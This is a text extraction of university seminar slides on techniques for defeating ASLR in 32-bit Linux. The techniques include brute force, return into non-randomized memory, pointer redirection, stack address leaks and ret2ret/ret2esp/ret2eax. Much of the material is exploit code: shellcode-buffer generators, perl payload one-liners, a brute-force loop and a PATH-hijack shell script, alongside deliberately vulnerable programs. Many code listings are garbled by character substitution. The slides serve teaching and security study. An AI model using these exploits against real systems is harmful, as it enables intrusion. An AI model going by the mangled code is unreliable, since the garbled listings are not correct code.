
Computer Science, Informatik 4

Communication and Distributed Systems


ASLR
Address Space Layout Randomization
Seminar on Advanced Exploitation Techniques
Chair of Computer Science 4
RWTH Aachen
Tilo Müller
Computer Science, Informatik 4
Communication and Distributed Systems
What is ASLR?
A security technology to prevent exploitation of buffer overflows
Most popular alternative: Non-executable stack
Enabled by default since Kernel 2.6.12 (2005) / Vista Beta 2 (2006)
Earlier third party implementations: PaX (since 2000)
Computer Science, Informatik 4
Communication and Distributed Systems
How does ASLR work?
ASLR = Address Space Layout Randomization
Aim: Introduce randomness into the address space of each instantiation
(24 bits of a 32-bit address are randomized)
→ Addresses of infiltrated shellcode are not predictable anymore
→ Common exploitation techniques fail, because the place of the shellcode
is unknown
1st inst.
2nd inst.
bfaa2e58
bf9114c8
p
r
o
c
e
s
s

m
e
m
o
r
!
p
r
o
c
e
s
s

m
e
m
o
r
!
s
t
a
c
'
...
...
bfaa2e14
bfaa2e10
bf911484
bf911480
Computer Science, Informatik 4
Communication and Distributed Systems
How does ASLR work?
unsigned long getEBP(void) {
__asm__(movl %ebp,%eax);
}
int main(void) {
printf(EBP: %xn,getEBP());
}
getEBP.c
Demonstration:
$ ./getEBP
EBP:bffff3b8
$ ./getEBP
EBP:bffff3b8
ASL disabled!
! "#getEBP
EBP:bfaa2e58
! "#getEBP
EBP:bf9114c8
ASL enabled!
Computer Science, Informatik 4
Communication and Distributed Systems
What is randomized?
Only the stack and libraries
e.g. not the heap, text, data and bss segment
Demonstration:
$ cat /proc/self/maps | egrep '(libc|heap|stack)'
)*)+,)))-)*).e))) r/-p )*)+,))) )):)) ) 0'eap1
b2e3e)))-b2fa3))) r-xp )))))))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so
b2fa3)))-b2fa.))) r--p ))4+2))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so
b2fa.)))-b2fa*))) r/-p ))4+*))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so
bfa),)))-bfa66))) r/-p bffeb))) )):)) ) 0sta$(1
cat /proc/self/maps | egrep '(libc|heap|stack)'
)*)+,)))-)*).e))) r/-p )*)+,))) )):)) ) 0'eap1
b2,a))))-b2ee2))) r-xp )))))))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so
b2ee2)))-b2ee*))) r--p ))4+2))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so
b2ee*)))-b2eea))) r/-p ))4+*))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so
bfa*.)))-bfa5b))) r/-p bffeb))) )):)) ) 0sta$(1
Computer Science, Informatik 4
Communication and Distributed Systems
"#er#ie! of ASLR resistant e$p%oits
,* 3rute force
)* Return into nonrandomi8ed memor!
:* 4ointer redirectin"
4* Stac' divul"in" methods
/* Stac' ?u""lin" methods
More methods can be found in the paper (e.g. GOT hijacking or overwriting .dtors)
Computer Science, Informatik 4
Communication and Distributed Systems
1. Bruteforce
Success of bruteforce is based on:
The tolerance of an exploit to variations in the address space layout
(e.g. how many NOPs can be placed in the buffer)
How many exploitation attempts can be performed
(e.g. it is necessary that a network daemon restarts after a crash)
How fast the exploitation attempts can be performed
(e.g. locally vs. over network)
void f8n$tion(c"a# 9args) {
c"a# b8ff0+)5.1;
str$p:(b8ff, args);
}
int main(int arg$, c"a# 9argv01) {
f8n$tion(argv041);
#etu#n );
}
vuln.c
Example:
Computer Science, Informatik 4
Communication and Distributed Systems
1. Bruteforce
)(* +
R941 #f***
4,-.
byte
)S* +
shell
code
***
NOPs
plausible
value
R941 #f***
shell
code
***
NOPs
R941 #f***
shell
code
***
NOPs
miss
miss
hit
& / 0
Computer Science, Informatik 4
Communication and Distributed Systems
&' (ruteforce
Chance: 1 to 2^24/4096 = 4096
→ 2048 attempts on average
Solution: Upgrade to a 64-bit architecture
#! /bin/sh
$"ile 0 ) 1; do
"#v8ln ;"#exploit <i;
i=<((<i > 6)+*))
if 0 <i ?gt 4.22264. 1; t"en
i=)
fi
done;
It takes about 3 minutes on a 1.5 GHz CPU to get the exploit working:
"""
@et8rn A,,ress: )xbfa7*5)4
"#br8tefor$e"s': line 5: 45)*4 Begmentation fa8lt
@et8rn A,,ress: )xbfa754)4
s'-7"4<
Exemplary bruteforce attack:
Computer Science, Informatik 4
Communication and Distributed Systems
"#er#ie!
,* 3rute force
)* Return into nonrandomi8ed memor!
:* 4ointer redirectin"
4* Stac' divul"in" methods
/* Stac' ?u""lin" methods
Computer Science, Informatik 4
Communication and Distributed Systems
2. Return into non-randomized memory
not
randomized
randomized
→ Exploitation techniques:
ret2heap
ret2bss
ret2data
ret2text
Stack: parameters and dynamic local variables
Heap: dynamically created data structures (malloc)
BSS: uninitialized global and static local variables
Data: initialized global and static local variables
Text: read-only program code
Computer Science, Informatik 4
Communication and Distributed Systems
2a. ret2text
The text region is marked read-only
→ it is just possible to manipulate the program flow
(advanced: borrowed code)
void p8bli$(c"a#9 args) {
c"a# b8ff0461;
str$p:(b8ff,args);
printf(p8bli$n);
}
void se$ret(void) {
printf(se$retn);
}
int main(int arg$, c"a#9 argv01) {
if (get8i,() == )) se$ret();
else p8bli$(argv041);
}
vuln.c
Example:
Computer Science, Informatik 4
Communication and Distributed Systems
2a. ret2text
#! /bin/bash
"#v8ln ;perl -e &print CACx4.; print Cxfax*7x)+x)*C&;
e%&loit.s"
***
stack
text
RIP | 0x080483fa
SFP | AAAA
buff | AAAA
0x080483fa: void secret(void)
Computer Science, Informatik 4
Communication and Distributed Systems
2b. ret2bss
c"a# globalb8f063.1;
void f8n$tion(c"a#9 inp8t) {
$'ar lo$alb8f063.1;
str$p:(lo$alb8f, inp8t);
str$p:(globalb8f, lo$alb8f);
}
int main(int arg$, c"a#99 argv) {
f8n$tion(argv041);
}
vuln.c
The bss segment contains the uninitialized global variables:
Two buffers are needed, one on the stack and one in the bss segment
Computer Science, Informatik 4
Communication and Distributed Systems
2b. ret2bss
...
stack
(randomized)
bss
(not
randomized)
0x080495e0
AAAA
AAAA
0x080495e0:
"lo#al
#uff
local
#uff
shellcode
shellcode
AAAA
RIP
SFP
Computer Science, Informatik 4
Communication and Distributed Systems
2c. ret2data
2d. ret2heap
Similar to ret2bss. Examples of vulnerable code:
Data: Initialized global variables
Heap: Dynamically created data structures
c"a#' globalb8f = CAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
void f8n$tion(c"a#9 inp8t) {
c"a# lo$alb8f063.1;
str$p:(lo$alb8f, inp8t);
str$p:(globalb8f, lo$alb8f);
}
void f8n$tion(c"a#9 inp8t) {
c"a# lo$al_b8ff063.1;
c"a# 9'eap_b8ff;
str$p:(lo$al_b8ff,inp8t);
'eap_b8ff = (c"a# 9) mallo$(siDeof(lo$al_b8ff));
str$p:('eap_b8ff,lo$al_b8ff);
}
Computer Science, Informatik 4
Communication and Distributed Systems
"#er#ie!
,* 3rute force
)* Return into nonrandomi8ed memor!
:* 4ointer redirectin"
4* Stac' divul"in" methods
/* Stac' ?u""lin" methods
Computer Science, Informatik 4
Communication and Distributed Systems
3. Pointer redirecting
Hardcoded strings are saved within non-randomized areas
→ It is possible to redirect a string pointer to another one
Interesting string pointers are arguments of system, execve, ...
Example:
int main(int arg$, c"a#9 args01) {
c"a# inp8t063.1;
c"a# 9$onf = Ctest -f E#"progr$C;
c"a# 9li$ense = CFGHB BIJFKA@E HB P@ILHMEM"""nC;
printf(li$ense);
str$p:(inp8t,args041);
if (s:stem($onf)) printf(CError: missing "progr$nC);
}
vuln.c
Goal: Execute system("THIS SOFTWARE IS ...")
→ system tries to execute THIS → write a script called THIS, e.g.:
#! /bin/bash
#bin#bas'
Computer Science, Informatik 4
Communication and Distributed Systems
3. Pointer redirecting
...
stack
data
input
&conf
&license
0x08048562
0x08048550
THIS S!T"#$%
IS ...
test *f
+,.-ro.rc
s:stem($onf)
=
s:stem(test -f E#"progr$)
Computer Science, Informatik 4
Communication and Distributed Systems
3. Pointer redirecting
...
stack
data
input
&conf
&license
0x08048562
0x08048562
THIS S!T"#$%
IS ...
test *f
+,.-ro.rc
s:stem($onf)
=
s:stem(FGHB BIJFKA@E HB""")
AAAA
Computer Science, Informatik 4
Communication and Distributed Systems
3. Pointer redirecting
int main(int arg$, c"a#9 args01) {
c"a# inp8t063.1;
c"a# 9$onf = Ctest -f E#"progr$C;
c"a# 9li$ense = CFGHB BIJFKA@E HB P@ILHMEM"""nC;
printf(li$ense);
str$p:(inp8t,args041);
if (s:stem($onf)) printf(CError: missing "progr$nC);
}
vuln.c
#! /bin/sh
e$'o C#bin#s'C ! FGHB
$'mo, 222 FGHB
PAFG=":<PAFG
"#v8ln ;perl -e &print CACx63.; print Cx.6x*3x)+x)*Cx6&;
e%&loit.s"
Computer Science, Informatik 4
Communication and Distributed Systems
"#er#ie!
,* 3rute force
)* Return into nonrandomi8ed memor!
:* 4ointer redirectin"
4* Stac' divul"in" methods
/* Stac' ?u""lin" methods
Computer Science, Informatik 4
Communication and Distributed Systems
4. Stack divulging methods
#define SA struct sockaddr
int listenf,, $onnf,;
void f8n$tion(c"a#9 str) {
c"a# rea,b8f063.1;
c"a# /riteb8f063.1;
str$p:(rea,b8f,str);
sprintf(/riteb8f,rea,b8f);
/rite($onnf,,/riteb8f,strlen(/riteb8f));
}
int main(int arg$, c"a#9 argv01) {
c"a# line04)6+1;
st#uct so$(a,,r_in serva,,r;
ssiDe_t n;
listenf, = so$(et (AJ_HNEF, BIOP_BF@EAQ, ));
bDero(Rserva,,r, siDeof(serva,,r));
serva,,r"sin_famil: = AJ_HNEF;
serva,,r"sin_a,,r"s_a,,r = 'tonl(HNAMM@_ANS);
serva,,r"sin_port = 'tons(222.);
bin,(listenf,, (BA9)Rserva,,r, siDeof(serva,,r));
listen(listenf,, 4)6+);
fo#(;;) {
$onnf, = a$$ept(listenf,, (BA9)NTUU,NTUU);
/rite($onnf,,C! C,6);
n = rea,($onnf,, line, siDeof(line)-4);
line0n1 = );
f8n$tion(line);
$lose($onnf,);
}
}
vuln.c
Goal:
Discover information about
the address space layout
Possibility 1:
Stack stethoscope
(/proc/<pid>/stat)
Possibility 2:
Format string vulnerabilities
Computer Science, Informatik 4
Communication and Distributed Systems
4a. Stack stethoscope
Address of a process stack's bottom:
28th item of /proc/<pid>/stat
The remaining stack can be calculated, since offsets are constant
The stat file is readable by every user per default:
$ dir /proc/$(pidof vuln)/stat
*r**r**r** 4 5008*05*56 55:04 ,-roc,45356,stat
Disadvantage: Access to the machine is required
Advantage: ASLR is almost useless if one has this access
Computer Science, Informatik 4
Communication and Distributed Systems
4a. Stack stethoscope
stack bottom
***
function
main
SFP
RIP
readbuf
writebuf
constant offset
(bfe14f30 - bfe14858 = 6d8)
Computer Science, Informatik 4
Communication and Distributed Systems
4a. Stack stethoscope
stack bottom
function
main
SFP
RIP
readbuf
writebuf shellcode
sb offset
sb = `cat /proc/$(pidof vuln)/stat | awk '{ print $28 }'`
offset = 6d8
***
Computer Science, Informatik 4
Communication and Distributed Systems
4b. Format strings
#define SA struct sockaddr
int listenf,, $onnf,;
void f8n$tion(c"a#9 str) {
c"a# rea,b8f063.1;
c"a# /riteb8f063.1;
str$p:(rea,b8f,str);
sprintf(/riteb8f,rea,b8f);
/rite($onnf,,/riteb8f,strlen(/riteb8f));
}
int main(int arg$, c"a#9 argv01) {
c"a# line04)6+1;
st#uct so$(a,,r_in serva,,r;
ssiDe_t n;
listenf, = so$(et (AJ_HNEF, BIOP_BF@EAQ, ));
bDero(Rserva,,r, siDeof(serva,,r));
serva,,r"sin_famil: = AJ_HNEF;
serva,,r"sin_a,,r"s_a,,r = 'tonl(HNAMM@_ANS);
serva,,r"sin_port = 'tons(222.);
bin,(listenf,, (BA9)Rserva,,r, siDeof(serva,,r));
listen(listenf,, 4)6+);
fo#(;;) {
$onnf, = a$$ept(listenf,, (BA9)NTUU,NTUU);
/rite($onnf,,C! C,6);
n = rea,($onnf,, line, siDeof(line)-4);
line0n1 = );
f8n$tion(line);
$lose($onnf,);
}
}
vuln.c
A format string vulnerability
that can be used to receive
stack addresses
Correct:
sprintf(writebuf,"%s",readbuf)
Advantage:
No access to the machine is
required.
Computer Science, Informatik 4
Communication and Distributed Systems
s
p
r
i
n
t
f
-
0
f
u
n
c
t
i
o
n
-
0
SFP
RIP
%20$x
***
***
bfbf1ec8
20th
parameter above the format string
***
stack bottom
constant offset
bfbf2220 - bfbf1ec8 = 358
4b. Format strings
→ The stack bottom can be calculated by an
exploitation of the format string vulnerability
→ Afterwards the exploit from the stethoscope
attack can be used again
Example:
0 ecAo B>50&1xB 7 &
0 'c 3oca3Aost ???6
0 =f=?4ec8
Computer Science, Informatik 4
Communication and Distributed Systems
"#er#ie!
,* 3rute force
)* Return into nonrandomi8ed memor!
:* 4ointer redirectin"
4* Stac' divul"in" methods
/* Stac' ?u""lin" methods
Computer Science, Informatik 4
Communication and Distributed Systems
Based on a pointer that is a potential pointer to the shellcode.
SFP
RIP
buff
Pointer
...
4a. ret2ret
Computer Science, Informatik 4
Communication and Distributed Systems
A potential pointer points to the shellcode if its least significant byte is
overwritten by zero (string termination).
But how to use this aligned pointer as return instruction pointer?
LL
*ointer $,,
LL
buff
NOPs
***
shellcode
***
4a. ret2ret
Computer Science, Informatik 4
Communication and Distributed Systems
Solution: chain of ret's.
ret can be found in the text segment (which is not randomized)
5ret
*ointer $,,
5ret
buff
NOPs
***
shellcode
***
4a. ret2ret
Computer Science, Informatik 4
Communication and Distributed Systems
5ret
*ointer $,,
5ret
buff
NOPs
***
shellcode
***
4a. ret2ret
ESP =
EIP =
EBP =
b()
a()
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
function epilogue of b:
Computer Science, Informatik 4
Communication and Distributed Systems
5ret
*ointer $,,
5ret
buff
NOPs
***
shellcode
***
4a. ret2ret
)S* +
)I* +
)(* +
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
Computer Science, Informatik 4
Communication and Distributed Systems
5ret
*ointer $,,
5ret
buff
NOPs
***
shellcode
***
4a. ret2ret
)S* +
)I* +
)(* + ???
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
Computer Science, Informatik 4
Communication and Distributed Systems
5ret
*ointer $,,
5ret
buff
NOPs
***
shellcode
***
4a. ret2ret
)S* +
)I* +
)(* + ???
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
Computer Science, Informatik 4
Communication and Distributed Systems
5ret
*ointer $,,
5ret
buff
NOPs
***
shellcode
***
4a. ret2ret
)S* +
)I* +
)(* + ???
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
Computer Science, Informatik 4
Communication and Distributed Systems
5ret
*ointer $,,
5ret
buff
NOPs
***
shellcode
***
4a. ret2ret
)S* +
)I* +
)(* + ???
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
Computer Science, Informatik 4
Communication and Distributed Systems
5ret
*ointer $,,
5ret
buff
NOPs
***
shellcode
***
4a. ret2ret
)S* +
)I* +
)(* + ???
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
Computer Science, Informatik 4
Communication and Distributed Systems
5ret
*ointer $,,
5ret
buff
NOPs
...
shellcode
***
4a. ret2ret
)S* +
)I* +
)(* + ???
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
Computer Science, Informatik 4
Communication and Distributed Systems
vuln.c
#define RET 0x0804840f
int main(void) {
c"a# 9b8ff, 9ptr;
long 9a,r_ptr;
int b8f_siDe = 6*);
int ret_siDe = 6);

b8ff = mallo$(b8f_siDe);
ptr = b8ff;
a,r_ptr = (long 9) ptr;
fo# (i=); iVb8f_siDe; i>=+)
9(a,r_ptr>>) = @EF;
fo# (i=); iVb8f_siDe-ret_siDe; i>>)
b8ff0i1 = NIP;
ptr = b8ff >
(b8f_siDe-ret_siDe-
strlen(s'ell$o,e));
fo# (i=); iVstrlen(s'ell$o,e); i>>)
9(ptr>>) = s'ell$o,e0i1;

b8ff0b8f_siDe1 = &)&;
printf(C%sC,b8ff);
#etu#n );
}
e%&loit.c
void f8n$tion(c"a#9 overflo/) {
c"a# b8ffer063.1;
str$p:(b8ffer, overflo/);
}
int main(int arg$, c"a#99 argv) {
int no = 4;
int9 ptr = Rno;
f8n$tion(argv041);
#etu#n 4;
}
4a. ret2ret
Computer Science, Informatik 4
Communication and Distributed Systems
After strcpy the shellcode is stored redundantly in the memory.
Idea: Use a perfect pointer to the shellcode placed in argv.
SFP
RIP
buff
Pointer
argv
shellcode
'''
4b. ret2pop
)I* 7
Computer Science, Informatik 4
Communication and Distributed Systems
Problem: Avoid overwriting the least significant byte of the perfect pointer
by zero.
SFP
RIP
buff
argv
*ointer $,,
5
4b. ret2pop
'''
shellcode
Computer Science, Informatik 4
Communication and Distributed Systems
Solution: A ret-chain followed by pop;ret.
The pop instruction skips over the memory location which is overwritten
by zero.
***
5ret
#uff
*ointer
$,,
shellcode
5pop1ret
***
4b. ret2pop
argv
'''
shellcode
Computer Science, Informatik 4
Communication and Distributed Systems
vuln.c
#define POPRET 0x0804846
#define RET 0x08048468
int main(void) {
c"a# 9b8ff, 9ptr;
long 9a,r_ptr;
int i;

b8ff = mallo$(6.+);
fo# (i=); iV6.+; i>>)
b8ff0i1 = &A&;

ptr = b8ff>6.);
a,r_ptr = (long 9) ptr;
fo# (i=6.); iV6.+; i>=+)
if (i == 6.)) 9(a,r_ptr>>) = PIP@EF;
else 9(a,r_ptr>>) = @EF;
ptr = b8ff;
fo# (i=); iVstrlen(s'ell$o,e); i>>)
9(ptr>>) = s'ell$o,e0i1;

b8ff06.+1 = &)&;
printf(C%sC,b8ff);
#etu#n );
}
int f8n$tion(int x, c"a# 9str) {
c"a# b8f063.1;
str$p:(b8f,str);
#etu#n x;
}
int main(int arg$, c"a# 99argv) {
f8n$tion(.+, argv041);
#etu#n 4;
}
e%&loit.c
4b. ret2pop
Computer Science, Informatik 4
Communication and Distributed Systems
The position of the ESP is predictable during the function epilogue.
→ jmp *%esp
)(* 8
)S* 8
SFP
RIP
buff
4c. ret2esp
Computer Science, Informatik 4
Communication and Distributed Systems
The position of the ESP is predictable during the function epilogue.
→ jmp *%esp
)(* 8
)S* 8
***
buff
shellcode
***
4c. ret2esp
M?mp EIesp
Computer Science, Informatik 4
Communication and Distributed Systems
)(* 8
)S* 8
***
buff
shellcode
***
4c. ret2esp
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
stack
text segment
function epilogue:
9 )I*
Wmp 9esp
somewhere:
***
M?mp EIesp
***
Computer Science, Informatik 4
Communication and Distributed Systems
)(* 8 )S* 8 ***
buff
shellcode
***
4c. ret2esp
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
stack
text segment
function epilogue:
9 )I*
Wmp 9esp
somewhere:
M?mp EIesp
Computer Science, Informatik 4
Communication and Distributed Systems
)(* 8 ?
)S* 8
***
buff
shellcode
***
4c. ret2esp
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
stack
text segment
function epilogue:
9 )I*
Wmp 9esp
somewhere:
***
M?mp EIesp
***
Computer Science, Informatik 4
Communication and Distributed Systems
)S* 8
***
buff
shellcode
***
4c. ret2esp
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
stack
text segment
function epilogue:
9 )I*
Wmp 9esp
somewhere:
)(* 8 ?
***
M?mp EIesp
***
Computer Science, Informatik 4
Communication and Distributed Systems
)S* 8
***
M?mp EIesp
buff
shellcode
***
4c. ret2esp
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
stack
text segment
function epilogue:
)I* 8
Wmp 9%esp
somewhere:
)(* 8 ?
Computer Science, Informatik 4
Communication and Distributed Systems
4c. ret2esp
Problem: jmp *%esp is not produced by gcc
Solution: Search the hexdump of a binary for e4ff,
which will be interpreted as jmp *%esp.
Example: The hardcoded number 58653
dec
= e4ff
hex
The chance to find e4ff in practice increases with the size of a
binary.
$ hexdump /usr/bin/X | grep e4ff | wc -l
4483
Computer Science, Informatik 4
Communication and Distributed Systems
#define !"P#ESP 0x08048$e8
int main(void) {
c"a# 9b8ff, 9ptr;
long 9a,r_ptr;
int i;

b8ff = mallo$(6.+);
ptr = b8ff;
a,r_ptr = (long 9)ptr;
fo# (i=); iV6.+>strlen(s'ell$o,e); i>=+)
9(a,r_ptr>>) = XQP6EBP;

ptr = b8ff>6.+;
fo# (i=); iVstrlen(s'ell$o,e); i>>)
9(ptr>>) = s'ell$o,e0i1;

b8ff06.+>strlen(s'ell$o,e)1 = &)&;
printf(C%sC,b8ff);
#etu#n );
}
void f8n$tion($'ar9 str) {
c"a# b8f063.1;
str$p:(b8f,str);
}
int main(int arg$, c"a#99 argv) {
int W = 3*.67;
f8n$tion(argv041);
#etu#n 4;
}
vuln.c
e%&loit.c
4c. ret2esp
Computer Science, Informatik 4
Communication and Distributed Systems
Return values are stored in EAX.
→ EAX could contain a perfect shellcode pointer after a function
returns a pointer to user input.
→ Overwrite RIP by a pointer to a call *%eax instruction
Example:
strcpy(buf,str) returns a pointer to buf, i.e.
bufptr = strcpy(buf,str)
causes EAX and bufptr to point to the same location as buf
4d. ret2eax
vuln.c
voi, f8n$tion($'ar9 str) {
$'ar b8f063.1;
str$p:(b8f, str);
}
int main(int arg$, $'ar 99argv) {
f8n$tion(argv041);
ret8rn 4;
}
Computer Science, Informatik 4
Communication and Distributed Systems
)(* 8
)S* 8
RIP
SFP
buf
4d. ret2eax
)A: 7 ?
voi, f8n$tion($'ar9 str) {
$'ar b8f063.1;
str$p:(b8f, str);
}
int main(int arg$, $'ar 99argv) {
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
Computer Science, Informatik 4
Communication and Distributed Systems
)(* 8
)S* 8
RIP
SFP
buf
4d. ret2eax
)A: 7 ?
voi, f8n$tion($'ar9 str) {
$'ar b8f063.1;
str$p:(b8f, str);
}
int main(int arg$, $'ar 99argv) {
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
s
t
r
c
p
!
-
0
***
SFP
RIP
Computer Science, Informatik 4
Communication and Distributed Systems
)(* 8
)S* 8
buf
4d. ret2eax
)A: 7 ?
voi, f8n$tion($'ar9 str) {
$'ar b8f063.1;
str$p:(b8f, str);
}
int main(int arg$, $'ar 99argv) {
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
s
t
r
c
p
!
-
0
***
SFP
RIP
Mcall EIeax
shellcode
***
***
***
Computer Science, Informatik 4
Communication and Distributed Systems
)(* 8
)S* 8
buf
4d. ret2eax
)A: +
voi, f8n$tion($'ar9 str) {
$'ar b8f063.1;
str$p:(b8f, str);
}
int main(int arg$, $'ar 99argv) {
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
shellcode
***
***
***
Mcall EIeax
Computer Science, Informatik 4
Communication and Distributed Systems
)(* 8
)S* 8
buf
4d. ret2eax
)A: +
voi, f8n$tion($'ar9 str) {
$'ar b8f063.1;
str$p:(b8f, str);
}
int main(int arg$, $'ar 99argv) {
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
shellcode
***
***
***
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
9 )I*
Mcall EIeax
Computer Science, Informatik 4
Communication and Distributed Systems
)(* 8 )S* 8
buf
4d. ret2eax
)A: +
voi, f8n$tion($'ar9 str) {
$'ar b8f063.1;
str$p:(b8f, str);
}
int main(int arg$, $'ar 99argv) {
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
shellcode
***
***
***
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
9 )I*
Mcall EIeax
Computer Science, Informatik 4
Communication and Distributed Systems
)(* 7 ?
)S* 8
buf
4d. ret2eax
)A: +
voi, f8n$tion($'ar9 str) {
$'ar b8f063.1;
str$p:(b8f, str);
}
int main(int arg$, $'ar 99argv) {
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
shellcode
***
***
***
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
9 )I*
Mcall EIeax
Computer Science, Informatik 4
Communication and Distributed Systems
)(* 7 ?
)S* 8
buf
4d. ret2eax
)A: +
voi, f8n$tion($'ar9 str) {
$'ar b8f063.1;
str$p:(b8f, str);
}
int main(int arg$, $'ar 99argv) {
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
shellcode
***
***
***
Mcall EIeax
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
9 )I*
$all 9%eax
Computer Science, Informatik 4
Communication and Distributed Systems
)(* 7 ?
)S* 8
buf
4d. ret2eax
)A: +
voi, f8n$tion($'ar9 str) {
$'ar b8f063.1;
str$p:(b8f, str);
}
int main(int arg$, $'ar 99argv) {
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
shellcode
***
***
***
Mcall EIeax
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
$all 9%eax
)I* +
Computer Science, Informatik 4
Communication and Distributed Systems
)(* 7 ?
)S* 8
buf
4d. ret2eax
)A: +
voi, f8n$tion($'ar9 str) {
$'ar b8f063.1;
str$p:(b8f, str);
}
int main(int arg$, $'ar 99argv) {
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
shellcode
***
***
***
Mcall EIeax
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
$all 9%eax
)I* +
Computer Science, Informatik 4
Communication and Distributed Systems
vuln.c
#define %A&&EA' 0x080484($
int main(void) {
c"a# 9b8ff, 9ptr;
long 9a,r_ptr;

b8ff = mallo$(6.+);
ptr = b8ff;
a,r_ptr = (long 9)ptr;
fo# (i=); iV6.+; i>=+)
9(a,r_ptr>>) = OAUUEAY;

ptr = b8ff;
fo# (i=); iVstrlen(s'ell$o,e); i>>)
9(ptr>>) = s'ell$o,e0i1;

b8ff06.+1 = &)&;
printf(C%sC,b8ff);
}
e%&loit.c
void f8n$tion(c"a#9 str) {
c"a# b8f063.1;
str$p:(b8f, str);
}
int main(int arg$, c"a# 99argv) {
f8n$tion(argv041);
}
4d. ret2eax
$ objdump -d vuln | grep -B 2 "call"
*)+*++f: 2+ 46 We *)+*+.7
*)+*+34: 74 ,b xor %ebx,%ebx
*)+*+37: ff ,) $all 9%eax
Find "call *%eax"
Computer Science, Informatik 4
Communication and Distributed Systems
Summary
1. Brute force
2. Return into non-randomized memory
a) ret2text
b) ret2bss
c) ret2data
d) ret2heap
3. Pointer redirecting
a) String pointer
4. Stack divulging methods
a) Stack stethoscope
b) Format string vulnerabilities
5. Stack juggling methods
a) ret2ret
b) ret2pop
c) ret2esp
d) ret2eax
Computer Science, Informatik 4
Communication and Distributed Systems
Summary
1. Brute force
2. Return into non-randomized memory
a) ret2text
b) ret2bss
c) ret2data
d) ret2heap
3. Pointer redirecting
a) String pointer
4. Stack divulging methods
a) Stack stethoscope
b) Format string vulnerabilities
5. Stack juggling methods
a) ret2ret
b) ret2pop
c) ret2esp
d) ret2eax
Additionally in the paper:
DoS by format string vulnerabilities
Redirecting function pointers
Integer overflows
GOT and PLT hijacking
Off by one
Overwriting .dtors
